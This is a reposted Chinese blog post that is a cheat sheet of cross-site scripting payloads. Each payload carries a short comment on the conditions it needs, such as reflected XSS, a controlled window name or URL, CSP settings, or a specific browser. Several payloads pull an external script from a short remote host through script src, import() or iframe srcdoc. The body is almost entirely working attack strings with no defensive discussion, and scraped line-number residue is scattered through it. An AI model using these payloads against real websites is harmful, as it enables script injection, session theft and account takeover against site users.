XSS-Payloads集合

举报
士别三日wyx 发表于 2021/12/23 02:26:17 2021/12/23
【摘要】 XSS-Payloads <!-- 仅适用于反射型XSS --!> <svg/onload=eval(name)> ...

XSS-Payloads

<!-- 仅适用于反射型XSS --!>
<svg/onload=eval(name)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果你控制了 URL --> 
<svg/onload=eval(`'`+URL)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果你控制了名字,但是 unsafe-eval 没有启用 --> 
<svg/onload=location=name>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!--  chrome 中,也适用于 innerHTML,即使在尚未插入 DOM 的元素上 --> 
<svg><svg/onload=eval(name)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果您控制窗口的名称,此有效负载将在innerHTML 内工作,即使在尚未插入DOM 的元素上--> 
<audio/src/onerror=eval(name)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果您控制 URL,此有效负载将在 innerHTML 内工作,即使在尚未插入 DOM 的元素上 --> 
<img/src/onerror=eval(`'`+URL)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 随便一个脚本 --> 
<script/src=//NJ.></script>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果你控制了窗口的名字 --> 
<iframe/onload=src=top.name>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果你控制了 URL --> 
<iframe/onload=eval(`'`+URL)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果页面上的 iframe 数量不变 --> 
<iframe/onload=src=top[0].name+/\NJ.₨?/>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 仅适用于 Firefox --> 
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果页面上的 iframe 数量是随机的 --> 
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果在 CSP 中禁用 unsafe-inline 并且允许外部脚本 --> 
<iframe/srcdoc="<script/src=//NJ.₨></script>">

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果允许内联样式 --> 
<style/onload=eval(name)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果允许内联样式并且可以控制 URL --> 
<style/onload=eval(`'`+URL)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果内联样式被阻止 --> 
<style/onerror=eval(name)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 使用外部脚本作为导入,在innerHTML 中不起作用,除非Firefox -->

     
    
    
  • 1
  • 1
<!-- PoC 仅适用于 https  Chrome,因为 NJ. 检查 Sec-Fetch-Dest 标头 --> 
<svg/onload=import(/\\NJ./)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 使用外部脚本作为导入,如果允许内联样式则触发。
<!-- PoC 仅适用于 https  Chrome,因为 NJ. 检查 Sec-Fetch-Dest 标头 -->
<style/onload=import(/\\NJ./)>

     
    
    
  • 1
  • 2
  • 3
  • 1
  • 2
  • 3
<!-- 使用外部脚本作为导入 --> 
<!-- PoC 仅适用于 https  Chrome,因为 NJ. 检查 Sec-Fetch-Dest 标头 --> 
<iframe/onload=import(/\\NJ./)>

     
    
    
  • 1
  • 2
  • 3
  • 1
  • 2
  • 3

弃用

<!-- 如果你控制了网址,Safari-only -->
<iframe/onload=write(URL)>

     
    
    
  • 1
  • 2
  • 1
  • 2
<!-- 如果允许内联样式,仅 Safari --> 
<style/onload=write(URL)>

     
    
    
  • 1
  • 2
  • 1
  • 2

在这里插入图片描述

在这里插入图片描述

文章来源: blog.csdn.net,作者:士别三日wyx,版权归原作者所有,如需转载,请联系作者。

原文链接:blog.csdn.net/wangyuxiang946/article/details/121276229

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。